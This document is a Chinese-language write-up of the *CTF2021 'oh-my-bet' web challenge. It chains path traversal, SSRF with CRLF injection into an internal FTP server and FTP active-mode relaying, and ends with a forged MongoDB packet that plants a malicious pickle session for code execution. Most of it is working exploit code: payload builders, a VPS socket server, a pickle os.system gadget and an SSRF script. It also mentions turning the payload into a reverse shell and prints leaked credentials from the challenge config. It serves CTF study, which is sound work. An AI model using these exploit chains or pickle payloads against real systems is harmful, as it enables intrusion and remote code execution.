*CTF2021 oh-my-bet

http://w4nder.top/?p=382

抓个包，发现头像处1.png，可以路径穿越

结果会保存在头像中

/app/utils.py

urllib请求，基本上是ssrf+crlf

/app/config.py

内网172.20.0.2 8877是个ftp，crlf看一下ftp文件可以得到config.json

ftp://fan:root@172.20.0.2:8877/files/config.json

看到172.20.0.5是mongodb，.3是mysql，.4是redis

{
 "secret_key":"f4545478ee86$%^&&%$#",
 "DEBUG": false,
 "SESSION_TYPE": "mongodb",
 "REMOTE_MONGO_IP": "172.20.0.5",
 "REMOTE_MONGO_PORT": 27017,
 "SESSION_MONGODB_DB": "admin",
 "SESSION_MONGODB_COLLECT": "sessions",
 "SESSION_PERMANENT": true,
 "SESSION_USE_SIGNER": false,
 "SESSION_KEY_PREFIX": "session:",
 "SQLALCHEMY_DATABASE_URI": "mysql+pymysql://root:starctf123456@172.20.0.3:3306/ctf?charset=utf8",
 "SQLALCHEMY_TRACK_MODIFICATIONS": true,
 "REDIS_URL": "redis://@172.20.0.4:6379/0"
}

并且session是flask_session，也就是说session是以序列化pickle的形式存储在mongo里
所以现在目的就是往mongodb中的session中插入恶意pickle数据，但是问题就是mongodb没有像ftp:// 一样的协议，不能直接用来ssrf。这里的打法也是让我学了一波

首先ftp有主动模式和被动模式一说，命令行使用如quote port 127,0,0,1,0,2233切换，主动模式可以远程请求一个服务器端口下载(STOR)和上传文件(RETR)，如

import urllib.request
# Upload file
a = '''TYPE I
PORT 127,0,0,1,0,1888
STOR bb2.txt
'''
c = 'ftp://fan:root@172.20.0.2:8877/files%0d%0a'
exp = urllib.parse.quote(a.replace('
', '
'))
exp = c + exp
print(exp)

这样crlf请求过去ftp就会启用主动模式，并从本地1888端口下载一个bb2.txt文件
在vps上起一个发送文件的socket

import socket
HOST = '0.0.0.0'  
PORT = 1888     
blocksize = 4096
fp = open('bb2.txt', 'rb')
s = socket.socket() 
s.bind((HOST, PORT))
print('start listen...')
s.listen(5)
conn, addr = s.accept()
while 1:
    buf = fp.read(blocksize)
    if not buf:
        fp.close()
        break
    conn.sendall(buf)
print('end.')

这样就能任意让ftp下载文件了

但是目标是通过ftp上传到mongo怎么实现，先ftp主动模式上传抓个包，还是用官方的脚本生成payload

import urllib.request
# Attack mongodb
a = '''TYPE I
PORT vps,0,27017
RETR test111.txt
'''
c = 'ftp://fan:root@172.20.0.2:8877/files%0d%0a'
exp = urllib.parse.quote(a.replace('
', '
'))
exp = c + exp
print(exp)

这里可以看到ftp会把文件内容直接放到tcp流中来上传

那么在本地用pymongo模拟一下更新mongo里的文件，

#https://blog.frankli.site/2021/01/18/*CTF-2021-Web/#oh-my-bet
from pymongo import MongoClient
import pickle
import os
def get_pickle(cmd):
    class exp(object):
        def __reduce__(self):
            return (os.system, (cmd,))
    return pickle.dumps(exp())
def get_mongo(cmd):
    client = MongoClient('localhost', 27017)
    coll = client.admin.sessions
    try:
        coll.update_one(
            {'id':'session:37386ce1-3fe8-4f1d-91fc-224581c5279f'},
            {"$set": { "val": get_pickle(cmd) }},
            upsert=True
        )
    except Exception as e:
        return e.message
if __name__ == '__main__':
    print(get_mongo('ls'))

本地起个docker抓一下

图中可以看到这一部分是关键的对mongodb更新的数据包，同样也是直接在tcp流中，那么我们如果在ftp中令发送的文件为这一串就是等效于通过ssrf ftp来操作mongo了

下一步就是生成文件，可以通过将raw数据包十六进制转换的方式，还有一种是这位师傅的

https://blog.frankli.site/2021/01/18/*CTF-2021-Web/#oh-my-bet

直接去pymongo源码里network.py找到发送数据的那一段，前面抛个异常就行了，我这里直接输出msg了(注意这里得用linux生成！免得踩坑了)

然后生成对应的文件，如下

改成弹shell的放到vps传到ftp，然后再将该文件发送到172.20.0.5 27017，变相更新了一次mongo

这时mongo里的数据就被改了

/readflag

ssrf脚本

# -*- coding:utf-8 -*-
import uuid
import re
import requests
sess=requests.session()
def get_source():
    res=sess.get(url+"/shake_and_dice")
    #print(res.headers)
    print(res.cookies)
    text=re.findall('<img src="data:image/png;base64,(.*?)" class="img-thumbnail".*?',res.text)
    if text:
        print("[+] Get source:")
        print(text)
    
def login(path):
    print("[+] Login")
    username=uuid.uuid4()
    data={
        'username':username,
        'password':username,
        'avatar':path,
        'submit':'Go!'
    }
    sess.post(url+'/login',data=data)
    
if __name__ == '__main__':
    url="http://192.168.134.132:8088/"
    login("ftp://fan:root@172.20.0.2:8877/")
    get_source()

https://github.com/sixstars/starctf2021/blob/main/web-oh-my-bet/oh-my-bet-ZH.md

https://blog.frankli.site/2021/01/18/*CTF-2021-Web/#oh-my-bet